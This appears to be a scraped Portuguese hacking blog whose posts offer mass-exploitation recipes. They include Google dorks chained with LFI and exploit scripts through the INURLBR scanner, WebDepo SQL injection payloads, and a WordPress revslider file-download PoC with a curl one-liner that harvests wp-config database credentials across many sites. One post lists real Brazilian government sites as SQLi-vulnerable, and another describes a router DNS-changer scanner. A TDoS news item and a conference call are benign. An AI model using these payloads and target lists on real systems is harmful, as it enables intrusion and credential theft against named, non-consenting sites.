TOOL DORKING SCANNER INURLBR 1.0:https://github.com/googleinurl/SCANNER-INURLBR
TOOL lfiINURL:
https://github.com/googleinurl/lfiINURL
COMMAND EX:
------------------------------------------------------
inurlbr.php --dork 'br+index.p=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&index.p=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'include=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&include=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
inurlbr.php --dork 'cn+page=' -s vull.txt -q all --comand-all 'URL="_TARGETFULL_&page=" && php lfiINURL.php -t $URL -c 10'
------------------------------------------------------
USE linux..
TOOL DORKING SCANNER INURLBR 1.0
Postado por
Unknown
às
11:30
0
comentários
Marcadores:
Exploits,
Kali Linux,
Pentest
(0DAY) WebDepo - SQL injection
Postado por
Unknown
às
06:41
EXPLOIT NAME: MINI exploit-SQLMAP - (0DAY) WebDepo -SQL injection / INURL BRASIL
Nas minhas pesquisas na web, sobre file_upload descobre um CMS da empresa israelense WebDepo, o mesmo possui falha de file_upload sem autenticação, mas analisando seus GETS pude observar que também tem falhas SQLi em seus parâmetros GET.AUTOR: Cleiton Pinheiro / Nick: GoogleINURL
Blog: http://blog.inurl.com.br
Twitter: https://twitter.com/googleinurl
Fanpage: https://fb.com/InurlBrasil
Pastebin: http://pastebin.com/u/Googleinurl
GIT: https://github.com/googleinurl
PSS: http://packetstormsecurity.com/user/googleinurl
YOUTUBE: http://youtube.com/c/INURLBrasil
PLUS: http://google.com/+INURLBrasil
VENTOR: http://www.webdepot.co.il
GET VULN: wood=(id) / $wood=intval($_REQUEST['wood'])
-----------------------------------------------------------------------------
DBMS: 'MySQL'
Exploit: +AND+(SELECT 8880 FROM(SELECT COUNT(*),CONCAT(0x496e75726c42726173696c,0x3a3a,version(),(SELECT (CASE WHEN (8880=8880) THEN 1 ELSE 0 END)),0x717a727a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
DBMS: 'Microsoft Access'
Exploit: +UNION+ALL+SELECT+NULL,NULL,NULL,CHR(113)&CHR(112)&CHR(120)&CHR(112)&CHR(113)&CHR(85)&CHR(116)&CHR(106)&CHR(110)&CHR(108)&CHR(90)&CHR(74)&CHR(113)&CHR(88)&CHR(116)&CHR(113)&CHR(118)&CHR(111)&CHR(100)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
-----------------------------------------------------------------------------
http://target.us/text.asp?wood=(id)+Exploit
GOOGLE DORK: inurl:"text.asp?wood="
GOOGLE DORK: site:il inurl:"text.asp?wood="
GOOGLE DORK: site:com inurl:"text.asp?wood="
Exploit: Clique Aqui
Execute exploit:
--help:
-t : SET TARGET.
-f : SET FILE TARGETS.
-p : SET PROXY
Execute:
php WebDepoxpl.php -t target
php WebDepoxpl.php -f targets.txt
php WebDepoxpl.php -t target -p 'http://localhost:9090'
EXPLOIT MASS USE SCANNER INURLBR
COMMAND: ./inurlbr.php --dork 'site:il inurl:text.asp?wood= ' -s 0dayWebDepo.txt -q 1,6 --exploit-get "?´'0x27" --comand-all "php 0dayWebDepo.php -t '_TARGET_'"
DOWNLOAD INURLBR: https://github.com/googleinurl/SCANNER-INURLBR
A segunda falha:
Exploit fckeditor 2015
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk
Vídeo: https://www.youtube.com/watch?v=2g1xxkMVgPk
GOOGLE DORK: inurl:"/text.asp?wood=" site:il
Exploit: -admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
POC:
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
[1] - http://target.us/target-admin/fckeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp
[2] - http://target.us/userfiles/file/{YOU_FILE}
0
comentários
Marcadores:
0day,
Exploits,
Pentest
Hackers criam ferramenta que faz ataques DDoS em linhas telefônicas !!
Postado por
Unknown
às
11:24
Não são só os sites e serviços da internet que estão sujeitos aos conhecidos ataques de negação de serviço – telefones comuns, sejam eles celulares ou não, também estão sujeitos a sofrerem golpes desse tipo. É o que revelou o site The Register que, nesta segunda-feira (23), trouxe a história do TNT Instant Up, um aparelho criado por hackers do leste da Europa voltado justamente para esse fim.
Vendido na internet por valores que variam entre US$ 500 e US$ 1.200, o equipamento utiliza um sistema interligado de modems e cartões SIM para bombardear um ou mais números com ligações. As chamadas são vazias e servem apenas para congestionar as linhas, impedindo que usuários legítimos consigam acessá-las.
A ideia, aqui, é basicamente a mesma de qualquer ataque DDoS: impedir o uso de serviços. Só que, aqui, eles não são retirados do ar, mas sim acabam apenas congestionados e inutilizáveis enquanto durarem os ataques. A prática está sendo chamada de TDoS, sigla em inglês para Telephone Denial of Service, ou negação de serviço telefônico.
O problema é que, na nova modalidade, os resultados seriam muito mais perigosos. Enquanto a maioria dos golpes desse tipo causam perdas financeiras para as empresas afetadas e inconveniência para seus usuários, o TDoS seria capaz de, por exemplo, bloquear serviços de emergência.
Além disso, o TNT Instant Up seria simples o suficiente para que literalmente qualquer pessoa conseguisse utilizá-lo. Em um vídeo demonstrativo disponível livremente no YouTube, um dos vendedores da ferramenta a exibe em funcionamento com vários celulares ao mesmo tempo, com números que são inseridos a partir de um software rodando em um computador. A negociação com o “comerciante” acontece pelo ICQ ou e-mail e o produto é enviado pelo correio como qualquer eletrônico convencional.
O FBI já teria identificado pelo menos duas circunstâncias em que um dispositivo como o TNT Instant Up foi utilizado para impedir o acesso de usuários a serviços de plano de saúde ou linhas de emergência. Apesar disso, não identificou crimes que estariam sendo realizados em relação ao ataque e que justificariam o bloqueio da linha e a tentativa de impedir que cidadãos contatem a polícia, por exemplo.
De acordo com as informações da IntelCrawler, uma fornecedora de sistemas e soluções de segurança, assim como nos ataques de negação de serviço na web, não existem maneiras de se proteger contra essa nova modalidade de golpe, a não ser, claro, desconectar a linha para que o aparelho pare de tocar sem parar. Uma alternativa que simplesmente não existe para serviços de emergência, principalmente, que agora se tornam alvo de mais uma ferramenta que pode ser usada por qualquer pessoa, seja qual for a intenção dela.
0
comentários
Marcadores:
Noticias
Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP
Postado por
Unknown
às
19:27
Aberto a Chamada de Trabalhos (CFP) para a próxima edição da Co0L BSidesSP está aberta !!!
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN(English Version)
As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:
- Data final para submissão de palestras e oficinas: 20/04
- Notificação aos autores selecionados: 23/03
- Divulgação da Agenda: 24/04
- Início das inscrições: 24/04
- Co0L BSidesSP v11: 24/05
A página abaixo tem os detalhes do CFP e o link para o formulário de submissão de conteúdo. A submissão de palestras e oficinas vai somente até o dia 20/04/2015.
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP
https://garoa.net.br/wiki/O_Outro_Lado_BSidesSP_ed_11/CFP_EN(English Version)
As atividades devem ter conteúdo relacionado a Segurança da Informação, Cultura Hacker ou qualquer forma de Hacking. Além de palestra e oficinas (com conteúdo mais prático), o CFP também serve para as Lightning Talks e atividades no Hacker Carreer Fair, Brazilian Arsenal e na "Bsides 4 Kids" (atividades voltadas para crianças e adolecentes).
Datas Importantes:
- Data final para submissão de palestras e oficinas: 20/04
- Notificação aos autores selecionados: 23/03
- Divulgação da Agenda: 24/04
- Início das inscrições: 24/04
- Co0L BSidesSP v11: 24/05
0
comentários
Marcadores:
Noticias
Sites .Gov Vulnerável SQLi
Postado por
Unknown
às
14:57
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
[17:01] <googleinurl> http://www.camaraxaxim.sc.gov.br/noticias/ver_noticia.php?id=77?'´0x27
[17:01] <googleinurl> http://www.cmubaporanga.mg.gov.br/mostra_noticia.php?noticia=000020?'´0x27
[17:01] <googleinurl> http://cmcaratinga.mg.gov.br/mostra_noticia.php?noticia=003111?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2688?'´0x27
[17:01] <googleinurl> http://www.cmsantaluziadooeste.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.itaenga.pe.gov.br/conferencia-do-meio-ambiente.php?'´0x27
[17:01] <googleinurl> http://www.camarajuina.mt.gov.br/vereadores_ver.php?id=8?'´0x27
[17:01] <googleinurl> http://astorga.pr.gov.br/teste/portal/cadastro.php?'´0x27
[17:01] <googleinurl> http://camaradecostamarques.ro.gov.br/?'´0x27
[17:01] <googleinurl> http://www.casaruibarbosa.gov.br/interna.php?'´0x27
[17:01] <googleinurl> http://www.cmsantafe.pr.gov.br/santafe/noticias.php?p=29?'´0x27
[17:01] <googleinurl> http://arcoverde.pe.gov.br/webnoticias_ler.php?id=2555?'´0x27
[17:01] <googleinurl> http://www.jau.sp.gov.br/secretarias.php?SEC_ID=41?'´0x27
0
comentários
Marcadores:
BackTrack - SQLi
0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification
Postado por
Unknown
às
01:19
-------------------------------------------------------------------------------------------
Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143
-------------------------------------------------------------------------------------------
Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------
Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------
All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL
Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php
Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR
Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'
Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
Example: --comand-vul {command}
Usage: --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
--comand-vul './exploit.sh _TARGET_ output.txt'
--comand-all Use this commmand to specify a single command to EVERY URL found.
Example: --comand-all {command}
Usage: --comand-all 'nmap sV -p 22,80,21 _TARGET_'
--comand-all './exploit.sh _TARGET_ output.txt'
Observation:
_TARGET_ will be replaced by the URL/target found, although if the user
doesn't input the get, only the domain will be executed.
_TARGETFULL_ will be replaced by the original URL / target found.
-------------------------------------------------------------------------------------------
INURLBR ADVANCED CONTROL
php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'
[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR Video Aqui
[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution Video Aqui
[TUTORIAL] - Getting access to the Wordpress panel Video Aqui
REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo
0
comentários
Marcadores:
Kali Linux,
Pentest
0x06 - SCANNER RouterhuntertBR 1.0
Postado por
Unknown
às
01:09
Inicialmente o RouterhunterBR foi desenvolvido para explorar vulnerabilidades DNSChanger em routers caseiros que possuem falhas em paginas sem autenticação dentro do roteador, Assim modificando o DNS padrão dentro do roteador.
O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunterBR.
Explora:
- 01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
- 02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
- 03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploit
Feito em PHP faz varreduras em faixas de ips pré-definidas ou alearias com números limites, até mesmo usando um arquivo fonte como referencias de ip.
- SET PROXY.
- USER AGENT RANDÔMICO.
- SAVE OUTPUT FILE.
[DOWNLOAD]
1 comentários
Marcadores:
Pentest
Assinar:
Comentários (Atom)












